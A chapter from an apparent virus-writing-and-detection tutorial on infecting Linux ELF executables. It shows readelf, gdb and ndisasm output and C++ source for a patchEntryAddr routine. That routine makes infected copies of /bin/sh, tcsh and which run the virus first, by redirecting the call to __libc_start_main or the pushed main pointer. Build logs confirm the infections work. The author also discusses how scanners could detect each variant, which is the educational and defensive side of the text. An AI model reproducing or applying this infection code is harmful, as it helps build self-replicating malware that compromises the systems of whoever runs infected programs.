The longest part of the journey is said to be the passing of the gate. | |
Marcus Terentius Varro |
After emotions cooled down a bit we can examine the infected executable and compare it with the original.
Command.
#!/bin/sh cd tmp/one_step_closer/one ls -l sh_infected readelf -l sh_infected |
Output.
-rwxrwxr-x 1 alba alba 524060 Mar 17 16:32 sh_infected Elf file type is EXEC (Executable file) Entry point 0x80c1273 There are 6 program headers, starting at offset 52 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4 INTERP 0x0000f4 0x080480f4 0x080480f4 0x00013 0x00013 R 0x1 [Requesting program interpreter: /lib/ld-linux.so.2] LOAD 0x000000 0x08048000 0x08048000 0x7a273 0x7a273 R E 0x1000 LOAD 0x07a280 0x080c2280 0x080c2280 0x057e0 0x09bd0 RW 0x1000 DYNAMIC 0x07f980 0x080c7980 0x080c7980 0x000e0 0x000e0 RW 0x4 NOTE 0x000108 0x08048108 0x08048108 0x00020 0x00020 R 0x4 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.got .rel.bss .rel.plt .init .plt .text .fini .rodata 03 .data .eh_frame .ctors .dtors .got .dynamic .bss 04 .dynamic 05 .note.ABI-tag |
File size and code segment have grown as expected. Data segment and DYNAMIC segment moved accordingly:
infected.file_size - sh.file_size = 524060 - 519964 = 4096 = 0x1000
infected.LOAD[1].Filesiz - sh.LOAD[1].Filesiz = 0x7a273 - 0x79273 = 0x1000
infected.LOAD[2].Offset - sh.LOAD[2].Offset = 0x7a280 - 0x79280 = 0x1000
infected.DYNAMIC.Offset - sh.DYNAMIC.Offset = 0x7f980 - 0x7e980 = 0x1000
Let's give the heuristic scanner a try.
Command.
#!/bin/sh echo '/bin/bash tmp/one_step_closer/one/sh_infected' \ | src/check_dist/check_dist.pl |
Output.
tmp/one_step_closer/one/sh_infected virtaddr=0x80c2280 dist=0x00000d 2 files; min_distance=0x00000d max_distance=0x00100d |
As predicted. This is like playing chess against oneself, and losing. Can't do much about it, though. I'll fix something else in revenge.
The value of Entry point changed dramatically. In the original it is in the first part of the file:
entry_point_ofs = 0x8059380 - 0x8048000 = 0x11380 = 70528 bytes.
The infected copy moved that to exactly 4096 bytes from the end of the code segment.
entry_point_ofs = 0x80c1273 - 0x8048000 = 0x79273 = 496243 bytes.
end_of_LOAD1 = 0x8048000 + 0x7a273 = 0x80c2273
entry_point_distance_to_end = 0x80c2273 - 0x80c1273 = 0x1000 = 4096
This is another easy vulnerability to scanners. By restructuring our code we can make that number even smaller. But for a real cure we need stronger voodoo.
If we chose to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code, starting at entry_point, find the first call (or jmp) and abuse it. This requires way too much intelligence for a virus, though.
But then we are operating in a homogeneous environment, having one compiler and one C run-time library for all. The startup code should be the same for every executable.
Command.
#!/bin/sh entry_point=$( readelf -l /bin/bash | sed -ne 's/^Entry point //p' ) gdb /bin/bash -q <<EOT | sed -ne '/:$/,/hlt *$/p' break *$entry_point run disassemble EOT |
Output.
(gdb) Dump of assembler code for function _start: 0x8059380 <_start>: xor %ebp,%ebp 0x8059382 <_start+2>: pop %esi 0x8059383 <_start+3>: mov %esp,%ecx 0x8059385 <_start+5>: and $0xfffffff0,%esp 0x8059388 <_start+8>: push %eax 0x8059389 <_start+9>: push %esp 0x805938a <_start+10>: push %edx 0x805938b <_start+11>: push $0x80ad030 0x8059390 <_start+16>: push $0x8058a60 0x8059395 <_start+21>: push %ecx 0x8059396 <_start+22>: push %esi 0x8059397 <_start+23>: push $0x8059480 0x805939c <_start+28>: call 0x8058fc8 <__libc_start_main> 0x80593a1 <_start+33>: hlt |
Of course we have to implement a check whether the code at the entry address really looks like above output. Just in case the target is already infected (by a superior virus). To implement a comparison we only need offset and size, not actual opcodes. But I will feel better after I have them straight in front of me. And ndisasm starts counting with zero, which requires less brain activity.
Command.
#!/bin/sh target=${1:-/bin/bash} entry_point=$( \ readelf -l $target \ | sed -ne 's/^Entry point 0x//p' \ | tr a-f A-F \ ) entry_point_ofs=$( echo "ibase=16; $entry_point - 08048000" | bc ) ndisasm -e $entry_point_ofs -U $target | sed -e '/hlt/q' |
Output.
00000000 31ED xor ebp,ebp 00000002 5E pop esi 00000003 89E1 mov ecx,esp 00000005 83E4F0 and esp,byte -0x10 00000008 50 push eax 00000009 54 push esp 0000000A 52 push edx 0000000B 6830D00A08 push dword 0x80ad030 00000010 68608A0508 push dword 0x8058a60 00000015 51 push ecx 00000016 56 push esi 00000017 6880940508 push dword 0x8059480 0000001C E827FCFFFF call 0xfffffc48 00000021 F4 hlt |
There is one remaining issue. Elf32_Ehdr::e_entry is an absolute address, as is the value popped off the stack by ret. The operand of call and jmp is encoded relative to the location of the following instruction, however. This is described in the documentation of nasm:
CALL imm ; E8 rw/rd [8086]
[…] The codes rb, rw and rd indicate that one of the operands to the instruction is an immediate value, and that the difference between this value and the address of the end of the instruction is to be encoded as a byte, word or doubleword respectively. Where the form rw/rd appears, it indicates that either rw or rd should be used according to whether assembly is being performed in BITS 16 or BITS 32 state respectively.
Source - patchEntryAddr.
bool Target::patchEntryAddr() { Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000; unsigned char* self_entry_code = (unsigned char*)self->e_entry; unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000); if (0 != memcmp(self_entry_code, target_entry_code, 0xc)) return false; /* check for "call" */ if (self_entry_code[0x1c] != target_entry_code[0x1c]) return false; /* check for "hlt" */ if (self_entry_code[0x21] != target_entry_code[0x21]) return false; int beyond_the_call = p.ehdr->e_entry + 0x21; int* patch_point = (int*)(target_entry_code + 0x1D); original_entry = beyond_the_call + *patch_point; *patch_point = newEntryAddr() - beyond_the_call; return true; } |
Output - build.
Infecting copy of /bin/sh... Ok Infecting copy of /bin/tcsh... Ok Infecting copy of /usr/bin/which... Ok |
Output - test script.
ELF/home/alba/virus-writing-and-detection-HOWTO/tmp/one_step_closer/two/sh_infected 2.05.8(1)-release /usr/bin/which ELF/usr/bin/which ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm |
Output looks nice, but we had that already. What has increased code size and complexity gained us?
Source.
#!/bin/sh ( readelf -l /bin/bash readelf -l tmp/one_step_closer/one/sh_infected readelf -l tmp/one_step_closer/two/sh_infected ) | grep '^Entry point' |
Output.
Entry point 0x8059380 Entry point 0x80c1273 Entry point 0x8059380 |
OK. One vulnerability of the infection is not visible to readelf anymore. But does that really help? It's still trivial to write a heuristic scanner for it. All it takes is to verify the operand of call shown in the disassembly listing.
Output.
00000000 31ED xor ebp,ebp 00000002 5E pop esi 00000003 89E1 mov ecx,esp 00000005 83E4F0 and esp,byte -0x10 00000008 50 push eax 00000009 54 push esp 0000000A 52 push edx 0000000B 6830D00A08 push dword 0x80ad030 00000010 68608A0508 push dword 0x8058a60 00000015 51 push ecx 00000016 56 push esi 00000017 6880940508 push dword 0x8059480 0000001C E8D27E0600 call 0x67ef3 00000021 F4 hlt |
Original value is 0xfffffc48, which resolves into a shared library. The new value is local to the executable and easy to spot: 0x67ef3. So what's the point?
gdb revealed us the name of the function whose call we abused: __libc_start_main. I can't help thinking that it is part of glibc, but don't be hasty.
Command.
#!/bin/sh ldd /bin/bash |
Ouput.
libtermcap.so.2 => /lib/libtermcap.so.2 (0x40022000) libdl.so.2 => /lib/libdl.so.2 (0x40026000) libc.so.6 => /lib/libc.so.6 (0x4002a000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) |
Now that we have a filename we can search the function in the library.
Command.
#!/bin/sh library=$( ldd /bin/bash | perl -ane 'm/libc/ && print $F[2];' ) nm -D $library --line-numbers --no-sort | grep __libc_start_main |
Output.
0001c278 T __libc_start_main /usr/src/build/53700-i386/BUILD/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c:53 |
First class service. We even got a line number from nm.
Command.
#!/bin/sh # third character of IFS is a tab-stop, not just a space IFS=' : ' read addr type name original_filename line_number < out/entry_point/nm my_filename="/usr/src/redhat/SOURCES/${original_filename#*BUILD/}" # If the file is not in the place I'm used to on my machine # we fall back to the copy shipped with this document. # Forcing my usage of SRPMs gains nothing. [ -e "$my_filename" ] || exit 0 sed -n "/^ *int\>/,$line_number p" \ < $my_filename \ > src/entry_point/__libc_start_main |
Output.
int /* GKM FIXME: GCC: this should get __BP_ prefix by virtue of the BPs in the arglist of startup_info.main and startup_info.init. */ BP_SYM (__libc_start_main) (int (*main) (int, char **, char **), int argc, char *__unbounded *__unbounded ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *__unbounded stack_end) { int *dummy_addr = &_dl_starting_up; |
If you have a procedure with 10 parameters, you probably missed some (according to an old saying).
Let's see what this declaration tells about the disassembled code. For one thing, arguments are pushed in reverse order on the stack. This is the traditional way of the C and allows easy implementation of functions like printf(3) that take an arbitrary number of arguments. Actual values for arguments: main = 0x8059480, init = 0x8058a60, fini = 0x80ad030. The case of rtld_fini needs more documentation.
Anyway, even without looking at the complete source of __libc_start_main I would guess that each of these function pointers is invoked at some time. Efforts are concentrated on main.
Source - patchEntryAddr.
bool Target::patchEntryAddr() { Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000; unsigned char* self_entry_code = (unsigned char*)self->e_entry; unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000); if (0 != memcmp(self_entry_code, target_entry_code, 0xc)) return false; /* check for last "push" */ if (self_entry_code[0x17] != target_entry_code[0x17]) return false; /* check for "call" */ if (self_entry_code[0x1c] != target_entry_code[0x1c]) return false; /* check for "hlt" */ if (self_entry_code[0x21] != target_entry_code[0x21]) return false; int* patch_point = (int*)(target_entry_code + 0x18); original_entry = *patch_point; *patch_point = newEntryAddr(); return true; } |
Output - test script.
ELF/home/alba/virus-writing-and-detection-HOWTO/tmp/one_step_closer/three/sh_infected 2.05.8(1)-release /usr/bin/which ELF/usr/bin/which ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm |
We see the same nice output again and again. So what's different this time?
Output.
00000000 31ED xor ebp,ebp 00000002 5E pop esi 00000003 89E1 mov ecx,esp 00000005 83E4F0 and esp,byte -0x10 00000008 50 push eax 00000009 54 push esp 0000000A 52 push edx 0000000B 6830D00A08 push dword 0x80ad030 00000010 68608A0508 push dword 0x8058a60 00000015 51 push ecx 00000016 56 push esi 00000017 6873120C08 push dword 0x80c1273 0000001C E827FCFFFF call 0xfffffc48 00000021 F4 hlt |
The difference to the original is less obvious. Both values of main are local to the executable. But again the modified value is exactly 4096 bytes from the end of the code segment.
It seems that we achieved little. But the concept of studying source code to find patch points looks promising. I declare this battle a draw. It might not change the outcome of the war. Still it gives hope to fight on.
<<< Previous | Home | Next >>> |
One step closer to the edge | Additional code segments |